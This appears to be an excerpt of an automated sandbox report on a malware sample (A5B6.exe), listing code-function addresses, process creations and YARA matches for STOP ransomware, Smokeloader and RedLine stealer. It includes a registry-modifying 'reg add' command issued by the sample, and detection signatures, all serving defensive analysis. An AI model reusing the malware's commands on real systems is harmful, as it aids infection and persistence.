Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Code function: 15_2_049B70E0 15_2_049B70E0
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Code function: 15_2_049BB000 15_2_049BB000
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Code function: 15_2_049CF030 15_2_049CF030
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Code function: 15_2_049BA026 15_2_049BA026
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Code function: 15_2_049DD1A4 15_2_049DD1A4
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Code function: 15_2_049B9120 15_2_049B9120
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Code function: 15_2_049FE141 15_2_049FE141
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Code function: 15_2_04A322C0 15_2_04A322C0
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Code function: 15_2_049B7220 15_2_049B7220
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Code function: 15_2_049B7393 15_2_049B7393
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Code function: 15_2_049FE37C 15_2_049FE37C
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Code function: 15_2_049B5DF7 15_2_049B5DF7
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Code function: 15_2_049B5DE7 15_2_049B5DE7
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Code function: 15_2_049F2D1E 15_2_049F2D1E
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Code function: 15_2_049E4E9F 15_2_049E4E9F
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Code function: 15_2_049B8E60 15_2_049B8E60
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Code function: 15_2_049B7880 15_2_049B7880
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Code function: 15_2_049D18D0 15_2_049D18D0
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Code function: 15_2_049DF9B0 15_2_049DF9B0
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Code function: 15_2_049DE9A3 15_2_049DE9A3
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Code function: 15_2_049B89D0 15_2_049B89D0
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Code function: 15_2_049B59F7 15_2_049B59F7
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Code function: 15_2_049BA916 15_2_049BA916
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Code function: 15_2_049B7A80 15_2_049B7A80
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Code function: 15_2_049BCA10 15_2_049BCA10
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Code function: 15_2_049BDBE0 15_2_049BDBE0
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Code function: 15_2_049C0B00 15_2_049C0B00
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Code function: 15_2_049B2B60 15_2_049B2B60
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Code function: String function: 049E0160 appears 49 times
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Code function: String function: 049D8EC0 appears 57 times
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: String function: 04AA0160 appears 49 times
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: String function: 04A98EC0 appears 57 times
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: String function: 00428C81 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: String function: 049E0160 appears 49 times
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: String function: 049D8EC0 appears 57 times
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: String function: 004547A0 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: String function: 0042F7C0 appears 55 times
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: String function: 0044F23E appears 53 times
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: String function: 00428520 appears 67 times
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 460 -p 2580 -ip 2580
Source: updater.exe.45.dr Static PE information: Number of sections : 14 > 10
Source: filename.exe.20.dr Static PE information: Number of sections : 14 > 10
Source: MdeeRbWvqe.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
Source: 9.2.A5B6.exe.49b15a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.2.A5B6.exe.49b15a0.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 24.2.A5B6.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 24.2.A5B6.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 28.2.A5B6.exe.49915a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 28.2.A5B6.exe.49915a0.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 15.2.A5B6.exe.49b15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 15.2.A5B6.exe.49b15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 17.2.A5B6.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 17.2.A5B6.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.2.A5B6.exe.49b15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.2.A5B6.exe.49b15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 14.2.A5B6.exe.4a715a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 14.2.A5B6.exe.4a715a0.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 10.2.A5B6.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 10.2.A5B6.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 16.2.A5B6.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 16.2.A5B6.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 10.2.A5B6.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 10.2.A5B6.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 29.2.A5B6.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 29.2.A5B6.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 23.2.A5B6.exe.49b15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 23.2.A5B6.exe.49b15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 24.2.A5B6.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 24.2.A5B6.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 14.2.A5B6.exe.4a715a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 14.2.A5B6.exe.4a715a0.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 16.2.A5B6.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 16.2.A5B6.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 29.2.A5B6.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 29.2.A5B6.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 23.2.A5B6.exe.49b15a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 23.2.A5B6.exe.49b15a0.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 15.2.A5B6.exe.49b15a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 15.2.A5B6.exe.49b15a0.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 28.2.A5B6.exe.49915a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 28.2.A5B6.exe.49915a0.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 17.2.A5B6.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 17.2.A5B6.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0000000E.00000002.2068427651.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000005.00000002.1986277821.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000018.00000002.2190525495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000018.00000002.2190525495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000009.00000002.2028556101.0000000002F21000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000009.00000002.2028759696.00000000049B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000E.00000002.2068159954.0000000002F43000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000001C.00000002.2265816595.0000000002F2B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000005.00000002.1986547068.0000000002EF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.1718596849.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000005.00000002.1986391859.0000000002E70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000001D.00000002.2276060736.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000001D.00000002.2276060736.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0000001C.00000002.2266063708.0000000004990000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000010.00000002.2076702437.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
